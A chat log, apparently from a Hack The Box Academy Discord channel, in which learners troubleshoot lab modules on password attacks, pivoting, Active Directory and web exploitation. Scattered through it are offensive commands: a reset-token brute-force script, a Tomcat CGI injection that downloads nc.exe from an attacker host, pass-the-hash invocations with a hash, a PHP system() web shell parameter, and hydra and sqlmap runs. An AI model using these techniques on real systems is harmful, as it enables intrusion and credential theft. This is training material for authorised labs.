#modules
Interesting case indeed. I wonder if it's replicable on all vpns
Humbling
Ok yeah I see it, will raise with the team
Could perhaps just be lag in the UI loading, the data coming back from the server is fine 😦
If you are willing to reproduce in a recording or something @mint trout (either video recording or network logs, but I'd prefer not network logs.. as they are pretty... verbose..) I'd be curious to see the behaviour
Anyway, attempt to sleep #3, hit me up in DM if you're willing 🙂
The fact that the machine data is received, and then the UI is rendered based upon the data, a bit weird that it wouldn't show that right state
Scratch that 😅 It'll be due to latency which would cause a delay in a UI update, with the root cause being the initial state data not accurately reflecting the machine state.
Have reported to the team @mint trout - thanks
Hi
Hi 🙂
How you doing
good 😄
Are you good with hack the box
U there?
I'm here 🙂 I can try and help but there are many people more knowledgeable than me
🙂
@tiny brook I don't accept random friend requests
I’m not random
I need some help trying to learn how HTB works
Idk you, so yes it's random
And you can google "intro to hack the box" and there's a help forum on how to get started
I can't connect to the VPN, tried US 2 and 3. I'm guessing this is on my end? Not seeing anyone else talking about stuff being down.
getting connection refused errors
working now, had to switch to us3 with udp
Not trying to be funny
Stuck on BROKEN AUTHENTICATION: Predictable Reset Token
Question:
Create a token on the web application exposed at subdirectory /question1/ using the *Create a reset token for htbuser* button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?
I have the script ready for token generation and testing.
What I am not getting is this UTC time conversion. The time which is displayed in the webpage is already in UTC, but with this time the right tokens are not generated. (I know the [timestamp in milliseconds-1000] and [timestamp in milliseconds+1000] range thing)
Can anyone show me the correct way to do it? Into which time should I convert it..!!!
And even converting to local remain same..!!
I am not getting it's logic
Not funny again
+/- 1 second for the proper token
change the script to +/-1
it resulted to generate only 2 tokens which are incorrect
I followed forums and others over here, everyone is talking about the 1000 thing but now it's not working..!!
I am really not getting it
1 second is 1000 milliseconds
I am using this to create the token md5_token = md5(str(x).encode()).hexdigest()
where x is the epoch time in milliseconds
do i need to modify something over here?
||
from hashlib import md5

print("Enter the time in millisec:\n")
time = int(input())          # reference timestamp in epoch milliseconds
starttime = time - 1000      # one second before the reference time
endtime = time + 1001        # one second after; +1 because range() excludes its end value

# write one MD5 token per candidate millisecond in the +/-1 second window
with open('tokens.txt', 'wt') as t:
    for x in range(starttime, endtime):
        md5_token = md5(str(x).encode()).hexdigest()
        print(md5_token, file=t)
||
Here is the python code I am using. It generates a tokens.txt
This tokens.txt I then use with wfuzz to check for the correct token
Any corrections/suggestions will be helpful
I have tried everything that I can think of for the answer to question 2 on the "Attacking web applications with ffuf". I've found 2 extensions and no combination of what I enter is correct. I've verified with external sources that I've got the correct information. What do?
alternatively, does Hack the Box have a forum where I can ask questions?
What section of that module?
It's the skills assessment section
Hello everyone! Is there someone who finished ADCS attack module?
I need help badly to skill assessment
I followed the ESC8 and ESC11 attack scenarios, I got stuck with coercer and PetitPotam
I am getting "The specified named pipe is in the disconnected state" error
I tried to target 2 IP I got stuck. It's been 10 hour. I appreciate anyone for help
If PetitPotam didn't work for you, you'll need to find another way.
PowerShell newbie. After importing PowerView.ps1, I try to run Get-NetUser -TrustedToAuth.
But I just get an error that a 'parameter cannot be found that matches' . If I run Get-NetUser without the parameter I don't get an error. What could I be doing wrong?
They are working but giving me an error + coercer as well
So then it is not working.
You need to find another way
I'm at your EDIT1 stage of this. I've done a lot of exploration but I might need to talk it through. Would you mind if I flicked you a DM about it?
Edit: never mind, I've just solved it. What a great puzzle. Yes, step back and strategise once all the bits are on the garage floor. Look at what each endpoint actually does.
Yeah np, DM me
nmap is not working, can anyone help?
it is super slow
i connected with the ovpn file in one terminal, and opened another terminal to do nmap scans
This is the only place where I have permission to message, so sorry if I am on the wrong place
Are you using -T 0 -sU
no
I think the problem is with connecting to the ovpn file
in all videos that i have watched, after connecting to the vpn, the end line in the terminal is Initialization Sequence Completed
and then there is "tun 0" written somewhere
in my case, there are multiple lines after connecting to ovpn
and it is "tun 1" instead
sudo killall openvpn then connect again, if you can ping the target ip, you're connected
pinging to the ip is a success
but scanning using nmap is becoming very frustrating
even a simple nmap scan is taking more than a minute
then it's not a vpn issue
depending on how you're scanning it can take a minute to hours 
Are you using your own virtual machine, or are you using the pwnbox?
my own
i tried doing some of the machines that I tried using the pwnbox
and it worked
i can only conclude that nmap is really slow in my device for some reason
like what would take 1/2 second in the pwnbox might take around 10 in mine
anyone has any solution to this? or am I to be bound by this slow-ness of nmap?
Make sure to choose either pwnbox or your VM. Using both will interfere with the VPN connection / drop your connection.
I've spent a lot of time in "Exploiting internal Web Applications II" trying to find the flag but it's annoying working with the exfil server. Are we able to create a web shell? Seeing as it's a public IP I figured we're not allowed to create web shells on these
yes i used pwnbox like a week ago
today i tried connecting using ovpn
will try again tomorrow
Thanks for all those who helped
I doubt it would work. Once you have the right payload it won't take too long doing it manually.
Hi in the password attack Module for CPTS.
For attacking SAM and attacking LSASS. When I try to transfer the dump file from the RDP session to the attack box, it always fails when I use the move command. It gives me "An unexpected network error occurred". I already set up the SMB server with SMB2 support and it still always fails when transferring the file. I tried other means of transferring the file but it still does not work
I clicked the Hint button and it told me where the flag was
There are multiple ways to transfer files. If you're using RDP a real simple way is using Remmina and just adding a share folder, or adding a share folder to the xfreerdp cli.
How did you manage to solve the problem? You use humangod’s methodology?
Thanks for the help. But yea I did that and it still didn't work. It keeps disconnecting the RDP session stating there's an error
Attacking Tomcat CGI
I am trying to get shell using the commands below, download was successful (200) when i checked my http server but when I dir, it wasn’t saved. Anyone know possibly why?
<victim IP>:8080/cgi/welcome.bat?&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F<IP>:8000%2Fnc%2Eexe+nc.exe
you can try a http server, or an ftp server
You're trying to save to windows\system32, and the tomcat server likely doesn't have permissions to save a file there. that would be my guess.
is there a way to reset module progress?
If you have completed a module, this button is available. I don't know if it resets the module
I dont think we normal users have that? Or maybe im blind
I'm just as normal as you are, I think 😉
Go to the module on the last page and then click on the Finish button. You will then be taken to a page where you can rate the module, where you will be offered further content and where this button is available
you are right
Hey everyone, I would like to ask for some tips regarding the last task in the "pass the hash" section of the "password attacks" module.
I'm trying to create a reverse shell to the target, using the Invoke-TheHash tool, but even tho the command says that it was executed, I don't get a connection in my ns.
I have tried changing the payloads, playing with different domain names, port numbers and I have also tried running these commands from other users using mimikatz, but to no avail. Can anyone push me in a right direction? I'm not sure what else I can do
In Password Attacks Network Services, Why errors?
did you generate your own powershell payload with the tun0 ip address? or just used the one from the module
Pretty sure that's not the correct password/username
I created my own one with the tun0
User john is presented on this machine but with a different password, in my case I've found user c*** to log in to RDP
dm
Yes, set timeout higher or use hashdump, we got administrator rights
Why can't I crack it?
I'm doing the Documentation & Reporting Practice Lab but it's painfully slow and keeps closing the connection. Is it just me or you guys also experienced this? I'm gonna take the exam in a couple of weeks, but if it's the same in the exam env then I will go crazy
Which user and password list did you use?
hello team is someone can help with serverside module and nginx reverse proxy section
woot!
nice
Thank you! took me forever, but it is done. I have about a month before I take the test.
Is there a correct account number in here? Why can't I try everything?
Is there a correct account number in here? Why can't I try everything?
yeap thanks bro
can someone help me solve PDFy challenge?
you posted the same question in #challenges 10 minutes ago
someone told me i should ask here
PDFy is a challenge, this channel is for academy modules
Attacking Common Services, Medium
can someone tell me how many TCP ports i should see? found a post, they have another open port, ive restarted my box several times, scanned all tcp ports, but still dont find the "missing" service
6
ok ima restart the box till it works xd
I know it sounds silly but use -p-
who can help me
Hey guys. Can you help me locate the area where you can see the Academy modules and it shows you where retired labs tie back to it if you need extra practice? I glanced at it a while ago, but I wanted some extra practice and I don’t know where to go for it.
Academy x HTB Labs
Thats it, thanks buddy
I sent you a DM actually
finally this damn port is shown to me
How do you guys study for cpts. Do you do labs from retired machines or do you do it after you finish the academy
i think the most common way to prep is to do the Attacking Enterprise Networks module blind
people have also done the Dante and Zephyr pro labs
I’ve been doing nothing but Academy stuff but I feel like I’m not tying it together well so I just paid for VIP plus so I can complement my studying
i've heard people say that doing the boxes doesn't help too much as much of what you see is out of scope on the exam
i definitely think it helps with understanding the process
and for that reason i think if you want extra practice, you should try doing a pro lab
Am I overthinking it, or is the exercise related to Windows RDP hard?
one reason I'm sure of is my own internet connection
So much to do so little time
also the gui is like prank on me or something
Hi
What would happen to my weekly streaks if I run out of boxes and modules I can purchase?
I'm currently at 21 weeks (kept my streak from the week weekly streaks were announced) and have purchased every tier 0 and one mini module from tier I, all and all with only 70 cubes. I have not finished all the modules I have purchased tho and 6 modules are remaining to be done but I'm curious is there any mechanic to preserve my streak if I'm not able to purchase more modules?
From my experience, there is not.
Btw streak can be done by doing exercises or complete a section 3 times
In intro to networking > VPN -> ??
I am having trouble with the Windows File Uploads section of File Transfers module. Specifically with using the WebDav for SMB file uploads. I have gotten all the other methods for file downloads and uploads to work, and this is the only one I am having trouble with.
bruh i cant chisel on htb pivoting ubuntu@WEB01:~$ ./chisel client -v 10.10.14.171:1234 R:socks
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel) ./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)
the target device isn't updated
you can compile with no CGO and it will work
what's cgo
Whoops. didn't mean to post that yet.
Anyway, SMB file uploads with WebDav :
I have started the WebDav server on my attack machine - I am using my own machine with a VPN, because if I used the PwnBox, it kept saying that port 80 was already in use.
Here is the command I used:
wsgidav --host=0.0.0.0 --port=80 --root=~/sharefolder --auth=anonymous
It appears to be running just fine. I placed a file in the designated root directory just so I could make sure I could see the file when connecting from the target windows machine.
I made sure I could ping my attack machine from the target machine, and that works fine.
I then enter this command from the PowerShell terminal on the target windows machine:
dir \\10.10.15.197\DavWWWRoot
All I get is the following error:
"dir : Cannot find path '\\10.10.15.197\DavWWWRoot' because it does not exist"
Download the chisel source and golang. run it like so
CGO_ENABLED=0 go build main.go
ok damle
you can also try some earlier versions of the chisel program and see which versions of GLIBC are linked to it and try to find the right one. But I think compiling a new one will be easier
Any help would be appreciated
sorry, i went to sleep and didnt see this. that's the issue -- when it's working as intended on a refresh it shows still spawning however when I'm just sat here like a twat for 5-10 minutes and it still says Spawning, on a refresh I get the button to spawn the machine. It's so intermittent but when it happens again I will save the clip 👍
I started the macos fundamentals module and i'm wondering if there is a macos vm or i need to have a mac ?
It's stated on the module overview (before purchase) that a Mac system would be required
Or a ton of googling
ah shit, ok thanks, didn't see that part
Hey. I am trying to get through Password Attacks PTH:
Invoke-SMBExec -Target \\172.16.1.5\\DC01\c -Domain inlanefreight.htb -Username david -Hash c39f2beb3d2ec06a62cb887fb391dee0 -Command "type david.txt" -Verbosec
But the command outputs \\172.16.1.5\DC01\david.txt did not respond
I tried many ips but nothing...
- make clean
CDPATH="${ZSH_VERSION+.}:" && cd . && /bin/bash '/home/ubuntu/ptunnel-ng/missing' aclocal-1.16
/home/ubuntu/ptunnel-ng/missing: line 81: aclocal-1.16: command not found
WARNING: 'aclocal-1.16' is missing on your system.
You should only need it if you modified 'acinclude.m4' or
'configure.ac' or m4 files included by 'configure.ac'.
The 'aclocal' program is part of the GNU Automake package:
https://www.gnu.org/software/automake
It also requires GNU Autoconf, GNU m4 and Perl in order to run:
https://www.gnu.org/software/autoconf
https://www.gnu.org/software/m4/
https://www.perl.org/
make: *** [Makefile:335: aclocal.m4] Error 127
ubuntu@WEB01:~/ptunnel-ng$ ls
aclocal.m4 config.guess contrib install-sh NEWS src
AUTHORS config.log COPYING Makefile PKGBUILD test
autogen.sh config.status debian Makefile.am PKGBUILD.dev web
autom4te.cache config.sub depcomp Makefile.in README
ChangeLog configure Dockerfile missing README.md
compile configure.ac INSTALL model_file.c selinux
ubuntu@WEB01:~/ptunnel-ng$ putnnel
Command 'putnnel' not found, did you mean:
command 'ptunnel' from deb ptunnel (0.72-3)
Try: sudo apt install <deb name>
ubuntu@WEB01:~/ptunnel-ng$ sudo ./ptunnel-ng -r10.129.153.190 -R22
sudo: ./ptunnel-ng: command not found
bruh why does this not work
I transferred the ptunnel repo to the target and then tried to make it but it won't work
try chmod +x to make it executable
I think he's talking about a git repo, and make isn't working
did you follow these instructions?
@mint trout maybe you know how to pass the hash correctly?
That
yes i did
//172.16.1.5\DC01\david.txt did not respond
smbexec gets you a shell, it doesn't open a file
Okay then, but where is the output?
VERBOSE: Service GRXCSMRWOYFADTUQLFJK deleted on 172.16.1.5
I tried type david.txt but no output shows up
Try without passing a command to it
Invoke-SMBExec -Target 172.16.1.5 -Domain inlanefreight.htb -Username david -Hash & -Verbose
VERBOSE: [+] inlanefreight.htb\david successfully authenticated on 172.16.1.5
[+] inlanefreight.htb\david has Service Control Manager write privilege on 172.16.1.5
Also redact the hash as it's spoiler
Redacted. Any hints?
I don't recall having too many issues with it tbh
config.status: executing depfiles commands
+ make clean
CDPATH="${ZSH_VERSION+.}:" && cd . && /bin/bash '/home/ubuntu/ptunnel-ng/missing' aclocal-1.16
/home/ubuntu/ptunnel-ng/missing: line 81: aclocal-1.16: command not found
WARNING: 'aclocal-1.16' is missing on your system.
You should only need it if you modified 'acinclude.m4' or
'configure.ac' or m4 files included by 'configure.ac'.
The 'aclocal' program is part of the GNU Automake package:
<https://www.gnu.org/software/automake>
It also requires GNU Autoconf, GNU m4 and Perl in order to run:
<https://www.gnu.org/software/autoconf>
<https://www.gnu.org/software/m4/>
<https://www.perl.org/>
make: *** [Makefile:335: aclocal.m4] Error 127
I can't make ptunnel on the target device
Please wrap your message in triple backticks ``` before and after
ok sorry but this module can't be beaten
do u have the module flag then I can take it
Just use a different pivoting/tunneling method
¯\_(ツ)_/¯
Invoke-SMBExec -Target 172.16.1.5 -Domain inlanefreight.htb -Username david -Hash & -Command "type D:\DC01\david\david.txt" -Verbose
What is wrong with it? I am struggling to do it 2 hours already
ok
Aren't you meant to just view the \\dc01\david share?
I am
That doesn't necessarily mean the file is on D:\
Try methods shown in the section
i tried mimikatz
Mimikatz will extract hashes
there are two methods of doing this: shell and running the command right away
for shell there is no permission
the command shows no output
What section exactly?
Password Attacks Pass The Hash
Try using mimikatz or rubeus to pth and create a new cmd and try accessing the share that way
ERROR kuhl_m_sekurlsa_pth ; CreateProcessWithLogonW (0x00000002)
I'm working on Password Attacks - Attacking SAM - Second Question:
When I go to copy the files from the Windows machine to my attack box via smbserver.py, the script works on my attacker box, but when I go to the Windows box and try to send the file, this is what I'm getting:
C:\> move sam.save \\10.10.15.3\CompData
The network path was not found.
Did you run as admin?
Is that what you named your share?
Yes.
Yep
I followed the guide exactly.
I also tried pinging the attack box from the remote machine, no response.
Somehow I have 2 VPN connections...what the hell 😐
Okay, I can ping the other VPN connection from the Windows machine, so they are connected.
wdym 2 vpn connections
\IP
\\Ip\Compdata
I guess you used 2x\ but discord funny
Yes.
Well I did that section today and had no problem moving it, run as admin, that's it
If you have 2 vpns something's funny. Restart both vpn connections and the box
Okay, now when running:
sudo python3 /usr/share/responder/tools/MultiRelay/impacket-dev/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
I'm not getting any output 😐
Does the same happen if you don't run sudo?
Same result.
Check if any of those 3 files are empty
Wait that's not the correct path to secretsdump.py
Yea lol
Yea but there should be another script
There's a few.
A lot
So it's after the colon, I see. Thank you for your help 🙂
For some reason this module is kind of a pain.
I enjoyed it
Interesting.
But if something goes wrong it can be pain
I totally see the necessity though.
Especially if you're pentesting infrastructure. It's impossible not to need this.
True. Well newer Windows hashes it differently but we still can crack them, so if the passwords are crackable it's needed
Ofc if we can dump it
I created a team but how do I invite my friend to my team???
Either I'm blind or dumbasf but I cannot for the life of me find out how
in this section (https://academy.hackthebox.com/module/77/section/859), the main website isn't styled, despite themes existing in /theme
is this an error?
I am at the same state as you were when you posted Though, I never got an other ticket other than server01.inlanefreight.local. I have been running rubeus monitoring for more than 30 minutes. Did you solve the problem with rubeus or did you follow the linux path? Thanks
Not an error
Ok thanks. I also can't find the admin password. Can someone point me in the right direction?
Just look around also some guessing can work too
what does this mean? dcfdd5e021a869fcc6dfaef8bf31377e from system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']); in the module https://academy.hackthebox.com/module/113/section/1210 i tried decoding it and it didn't work
Looks like hex maybe
Could be a session cookie
Or something
that's the GET parameter for the page
it's demonstrating that in a pentesting engagement, you ought not to use easily guessable parameters (e.g., cmd)
in this case, they used an MD5 hash as the parameter which is not easily guessable
wju
bruh in RDP and SOCKS Tunneling with SocksOverRDP I transferred over the SocksOverRDP files but the freaking thing on the target device won't load the dll even tho that's what the module says, cause it says there's a virus
regsvr32.exe SocksOverRDP-Plugin.dll
operation did not complete successfully because the file contains a virus
disable av/real time protection
it i
how's it saying there's a virus if it's disabled?
if it's disabled it wouldn't be able to do that
idk
you can DM me and I can help if you want
nvm I found it, thank u, u were right, but wtf proxifier costs money??? why tell us to use it
haha. free trial though
Enterprise licensing goes brrr
Hello guys does anyone here know anything about cyber security?
no, that's why we're here, to learn
Someone threatened to swat me so my question is, is it possible for someone to find my address from my TikTok acc?
no
Nope, we dumb
i configured proxifier for 127.0.01 1080 then i go to rdp and it doesnt rdp into the private network why?
<@&861185840277487616>
yes they can and now i will find ur ip from dis cord >:)
Any answers ?
Why you pinged for this?
Take it to the authorities, this isn't the place
Depends
Was it wrong? The guy is asking for help doxxing people.
He's saying someone is threatening to swat him
No I’m asking for help to not get doxxed myself
Reread the question.
alright sorry
My TikTok is completely anonymous, no information can be found on it
If you have multiple accounts under the same username it gets easier to narrow down who you are
Yh ik
what module is this a part of?
That’s the only account with a name like that, my other accounts on other media aren’t even remotely similar
Anyway. Getting off topic
i configured proxifier for 127.0.01 1080 then i go to rdp and it doesnt rdp into the private network why?
how can i get proxifier to work
The steps in the module worked for me
theres no network traffic for proxifier
I should be good then, thanks a lot 🙏
You can still DM me if you want help but I'm about to leave
i c ok danke
anyone working on AD Skills Assessment Part II? My connection keeps getting closed after 15-20 seconds, totally unenjoyable and frustrating
Try a different vpn region and tcp?
I'm trying from the pwnbox but it's the same there
Message support, it's weekend so you may not get a reply
yea I already did but I really hope it's not going to be the same during the exam because it's impossible to do anything like this
the exam environment is more stable than the module environments
good to know 🙂
I'm doing the end of module exercises for the DNS enumeration section under the Footprinting module
successfully managed to perform a zone transfer, but not seeing a txt record with a flag.... not sure if I misunderstood
Attacking Common Services, Hard
need a nudge
what ive done so far:
||got into SMB with Null Session, found some folders and interesting .txt files
brute forced RDP as user f.... and logged in via xfreerdp
from the outside i cant login mssql, and as user f.... i cant find anything that looks like a DB||
There's a subdomain you can transfer
sqlcmd
In command prompt
Or powershell
There's multiple questions
ahh nm then
One of them is the txt record
ah thx
ok thx
does that mean bad login/password combo or does it mean something else?
bc it talks about driver
the login failed, bad creds or the user doesn't have permission
hm I'm a bit lost, tried to impersonate the other two users with those creds lists from SMB by opening a prompt as a new user without success
also connecting to the DB as those users with the creds files, no success. what am I missing?
RDP and SOCKS Tunneling with SocksOverRDP
I do all of it, then when I connect to the 2nd pivot device it logs in then says network failed
how the frick can I make it work? it just fails the network connection when I log in as jason
now i get it... so basically when the user sends a request for /dcfdd5e021a869fcc6dfaef8bf31377e it will run the system function that will give us shell access
http://page.htb/param?dcfdd5e021a869fcc6dfaef8bf31377e=id
if i can do a zone transfer from a nameserver. what is the point of running a bruteforce via a script like dnsenum?
am i right in thinking that a zone transfer will give me everything and thus a bruteforce for more information is not necessary- at least by querying the dns server
i can impersonate 2 users inside sqlcmd, but both dont have sysadmin privs
In the SQL Map HTTP Request section, why does
sqlmap 'http://<ip>/case3.php' --cookie='id=1' --dump --batch
not work, but
sqlmap 'http://<ip>/case3.php' --cookie='id=1*' --dump --batch
does work?
The way the module explained it, the * was only to specify one of multiple options
I'm getting an error
[16:52:20] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1'). You are advised to rerun with '--crawl=2'
This should work
Also, --dump is not covered until the next section.
I'm in
--dump isn't covered until the next section on database enumeration
Am I supposed to read ahead to the end of the module (all sections) before trying the questions for each section?
Also, question 4 doesn't have any JSON data. Do I just use the regular header?
Nevermind, guess not
Where is the JSON data then?!
Could someone please help me with this question
Investigate all records for the domain "inlanefreight.com" with the help of dig or nslookup and submit the one unique record in double quotes as the answer.
working on https://academy.hackthebox.com/module/18/section/81
I ran the following, but nothing comes out in the terminal...
find / -type f -name *.conf -size +25k -size -28k -newermt 2020-03-03 -exec ls -a {} ; 2>/dev/null
am I doing something wrong?
I have the \ after the {} but it's not showing in my copy/paste
Did you get this figured out?
there are forum posts on this that can help
you can use back ticks for code in discord
for example
find / -type f -name *.conf -size +25k -size -28k -newermt 2020-03-03 -exec ls -a {} \; 2>/dev/null
No, I put it down for now since I'm really lost, I feel like I executed most of the commands given to us
Follow the commands one at a time and verify as you move along.
like write down all the unique records possible ?
No, compare your output to what's in the lesson.
My fault. My outputs were the same i even tried digging deeper
finally made it to Attacking Common Applications, ima be dead T-T
I'm doing AD enum & attacks, it gives incorrect creds when I'm trying to RDP from my Windows but the same creds are working when I RDP using my Linux. Anyone know what could be the reason?
the domain, xfreerdp automatically determines the domain I believe, for others you might have to specify it manually as domain\user
You need to set the source port for your own connection as 53
With netcat
Wait
Literally just be patient
It can take up to a minute
Nope
I'm telling you to be patient with nc
No
Part of the module told you that you may need to use netcat, as nmap may not grab everything
Then you're not gonna like password attacks
A lot of this field is patience
Just don't get hung up on it
The intended way is with nc
Maybe it's not a banner
It could be
You're gonna run into situations where one tool doesn't get the answers but another does
And like I said, it could be coded to not be a banner, and instead be on a polling timer to send it every N seconds
It's not though
Just forget about it and move on
You're gonna have to get over that then
Because nmap can and will miss things, which is the point
I am working on the module: Password Attacks - Pass the Ticket (PtT) from Linux. I have an issue with evil-winrm. I successfully connected to dc01 with Julio's ticket, but when I ran any command, I got an error and evil-winrm terminated. Please advise. Thank you very much.
here is the error I got:
Evil-WinRM PS C:\Users\julio\Documents> whoami
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc01:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc01:5985 ... OK
inlanefreight\julio
malloc_consolidate(): unaligned fastbin chunk detected
zsh: IOT instruction proxychains evil-winrm -i dc01 -r inlanefreight.htb
your evil-winrm might be messed up, reinstall maybe
has anyone ran into this issue with bloodhound python ERROR: Could not find kerberos credential cache file
I figured it out, I had to edit the krb5.conf file (made it perms 777)
AD Skill assessment 1.
Question: Submit this user's cleartext password.
I tried mimikatz with logonp-- even with the FXXL option, and I still didn't get anything. Any ideas what I can do?
I can try secretsdump.exe but I seriously don't get what kind of prompt/parameters I should give.
you can use secretsdump, dump the reg hives locally, transfer them out and use secretsdump.py on your own machine
Hi, I am doing Pass the Hash (PtH) section exercise. While I have managed to get the david.txt file for
Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt.
what I don't understand is that the command prompt that I get after executing the mimikatz command using david's hash shows MS01\Administrator when executing whoami. Both PowerShell sessions have the privilege of user MS01\Administrator, then why in one instance can I access DC01, while in the other I cannot?
any hint for the list used for the kdbx archive on password labs - hard?
You're impersonating David still
Crack the password and use it on the machine, hint: ||it's for a password manager||
sure but the list used for its hash, having trouble with that
Password list, mutated password list, rockyou
used them
Anyone free to give me a hint as to why I can't crack the Administrator password for the "Password Attacks Lab - Hard" module? I've tried numerous times to brute force it with the mutated passlist and I get nothing.
Did you use the 2john for it?
But how?
Hashes are useful without needing to be cracked
How can I confirm that?
You can access his share
It's one of those things that don't show up because windows is dumb
Yes. I know this in this particular case. But when I have to do pentesting without the knowledge that his share exists in another server, how can I be sure?
Just the fact that I am using David's hash should confirm that I have his privileges?
you cant be sure of stuff unless u try it out
It would error out if it didn't work
Okay thanks!
marcie I need a tip
yup
I got SAM save, security save and system save, and I wanna transfer them.
Actually nvm
If you have an rdp session: xfreerdp has /drive: btw
I used a fair bit of pivoting for the first one, since you're only given a web foothold
rockyou is supposed to be 133mb right?
Rockyou is much larger, the gzip might be smaller though
the one in /opt/useful/seclists in the other modules is 133mb, used that before
I think the seclists one is different
generally brute forcing passwords shouldn't take more than 5-10min on htb right?
The one I've used is default in my /usr/share/wordlists
you saved my life
This would be cracking, not bruteforcing
right yeah
AD skill assessment 1 is burning me, but I am almost done
2 is somewhat better as they give you a jump host to use instead of a shitty web launch point
And yes, the jump host they give has all the tools
thank god
so uh, I saw the drive option, I don't get what it does
does it create an active shared folder
yup, same number of lines as mine lol
between the attack host and the one I am connected to
Hello friends, can someone help me on suricata skill assessment?
Basically makes a network share
I have no idea what I am doing wrong ima open up some documentation
Ohh drive name, path
well xfreerdp loaded, let's see where I can find that
"This PC"
\\tsclient\shareName
Will it work even if it doesn't show up?
You also shouldn't need quotes for the filepath
that's the prompt I gave
it should show up, you can try to access it in the command line ig
will try again with the quotes
That looks fine to me
AHHH THERE WE GO
Delete this
Looking hot
checking if its the right hash
||keepass2john Logins.kdbx | grep -o '$keepass$.*' > CrackThis.hash||
this command right?
You don't need to grep
i was about to ask why did u grep
You can just redirect to a file
Another question, when I add en entry to registry for xfreerdp as reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f, I can no longer connect to the target using evil-winrm, it just shows TimeOut? Is it just me or anyone else is also facing the same problem?
restrictedadmin should only affect rdp
Just an idea, when I did this module I did not check md5 of transferred file and .... There was an issue.
Hi everyone,
In the module 'System Information', after I connect using academy-regular.ovpn from my VMware, I get this (screenshot) and it keeps saying permission denied. How do I make this work? I used the password as shown in the module but I keep getting this:
Work on the syntax
How do I do that? I'm a total newbie and would really appreciate your support.
Read the section of the module as it would hint you about the syntax of the SSH command if you are working on the Linux Fundamentals module
Thank you! I'll have a look at it now.
ssh user@ip
When I do that, I get 'Temporary fail in username.'
I am still trying to figure it out.
you'll need to use the right username
clever
MVP
I keep getting the same issue.
I typed the password correctly, I even copied and pasted it but the issue is still the same in my VMware
Wrong syntax on ssh connection.
What am I missing here? When I try to ssh htb-student (ip), it doesn't connect.
I don't know what to do
ssh htb-student@{ip}
Wow! I got in!
I will make sure to read the syntax clearly next time.
Thank you all so much for the support!
this or -l for username
guys my HTB academy $8 subscription renewed automatically and that's fine, but the problem is that my CC was empty even before the renewal day 😭
which was on the 21st
hello guys, in the pivoting module, every time I run dnscat2.ps1 on the windows host, I'm able to execute one command from the server, then it disconnects throwing an error
is it a bug in the ps1 module of dnscat ?
I had no issues completing that section as it was instructed
okay
null hashes for sam and system in the unlocked vhd, not a bug right?
password attack labs - hard
it would greatly help if you put the module and section, but i think i recall something like that and nothing was bugged
Ok, any tips going forward?
you can dm me your steps and i can look at it
how to access challenge channel
i think you have to set yourself up through the #welcome channel first and link your account
Anyone ran into this problem: ./chisel: error while loading shared libraries: libgo.so.42: cannot open shared object file: No such file or directory.
While doing the pivoting with chisel ?
yes, you need to downgrade and use an older version of chisel
okay thx mate
You can compile a static one with go
I've got a problem loading the page when opening the ip address
by static u mean a binary that doesn't rely on shared libraries ?
hey?
@winged egret yes, in go it's fairly easy, most of the time you get there with CGO_ENABLED=0
mmm ill keep that in mind thx
No one has any idea what you're talking about, we're not mind readers, you should include the module and section you're having trouble with
"NTLM RELAY ATTACKS", Skill Assessment: I am currently stuck on Question 2 and could use some nudge. I will share what I have tried so far.
try one of the relay esc
Thx for the prompt response! I have tried pretty much any esc technique. I can give more details in DM to avoid spoilers.
In Password Attack Password Reuse / Default Passwords, I logged into ssh as sam and then used mysql -u -p but I don't know what to do, can anyone give me some tips?
Hey all! Not sure what the issue is here. This is the Footprinting, SMB module
I made sure no trailing white spaces are there and also tried respawning the machine, but that unfortunately did not help
wrong flag
Right, now I understand the issue. I used !cat as it was supposed to be displaying the flag on the samba share, while it was just showing the flag inside the local directory I was running the smbclient from 🙂 thanks
!cat is used so you don't need to get out of the smb session, for example. Cat flag would display the one in the smb session
Yep, makes sense now, thank you!
Hello guys
which is the best job role in cybersecurity?
Thats just preference. Some ppl prefer jobs more into red teaming, some prefer defending or malware analysis etc.
the best is what you like the best
probably owner of the company
CISO?
I am stuck on suricata skill assessment. I need help on creating the suricata alert using the right keyword: alert tcp any any -> any any (msg:"WMI Execution Detected"; content:"Win32_ProcessStartup"; content:"powershell"; sid:2024233; rev:2;)
did you figure out how to fix this? having the same issue
Update Visual studio, worked for me. If not try reinstall. Im not sure why that happens
thanks
new module - Active Directory Trust Attacks
@rapid sparrow I see you've done the CDSA and were stuck on the same question as me once; Using VAD analysis, pinpoint the suspicious process and enter its name as your answer. Answer format: _.exe may I bug you about how I might arrive at the solution :3
I forgot it... I didn't take any notes
So far I've done the steps using velociraptor and downloaded the SANS_TRIAGE Image
ohhh :P
pm
well if you remember even the slightest hint would help :3
it's just you and whatever tools you have on the target
scroll through the options in velociraptor and choose the ones that seem interesting
so no custom tooling required? I see the zimmerman suite of tools isn't present on the target either
Answer the questions below through Velociraptor collections that gather artifacts similar to the ones presented in this module.
ah I see, I'll try and figure it out
Hello, anyone completed the "Intro to Assembly Language" module?!
just ask your question
Could I dm you perchance? I'm really quite stuck and if you took notes I see this as an opportunity for me to learn all this
I am kind of stuck in the "find the hex value in 'rax' when we reach the instruction at <_start+16>?" I try to follow the hint but it seems I am doing something wrong
guys I am stuck here
hydra -l sam -P mut_password.list ssh://10.129.206.74
single step until that instruction, then look at the value of $rax
don't attack ssh
but wordlists have around 90k passwords
and if not ssh then what to use?
scan the target and see
I can only do 3 single steps... and then I get "Cannot find bound of current function" ...
ssh is brutally slow
I'm suffering the same fate
perhaps your gdb is in hex, in which case it's +10 for binary +16
okay then ftp
and what about password list
do I need to modify because it contains 90k words
use the mutated list
90k is normal, it'll take some time
you can use more threads as well
48 is most stable
